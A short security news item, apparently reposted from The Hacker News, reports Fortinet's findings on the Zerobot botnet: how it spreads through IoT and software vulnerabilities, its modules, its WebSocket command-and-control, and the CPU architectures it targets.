Select Page

A novel Go-based botnet called Zerobot has been observed in the wild proliferating by taking advantage of nearly two dozen security vulnerabilities in the internet of things (IoT) devices and other software.

The botnet “contains several modules, including self-replication, attacks for different protocols, and self-propagation,” Fortinet FortiGuard Labs researcher Cara Lin said. “It also communicates with its command-and-control server using the WebSocket protocol.”

The campaign, which is said to have commenced after November 18, 2022, primarily singles out Windows and Linux operating systems to gain control of vulnerable devices.

Zerobot gets its name from a propagation script that’s used to retrieve the malicious payload after gaining access to a host depending on its microarchitecture implementation (e.g., “zero.arm64”).

The malware is designed to target a wide range of CPU architectures such as i386, amd64, arm, arm64, mips, mips64, mips64le, mipsle, ppc64, ppc64le, riscv64, and s390x.

images from Hacker News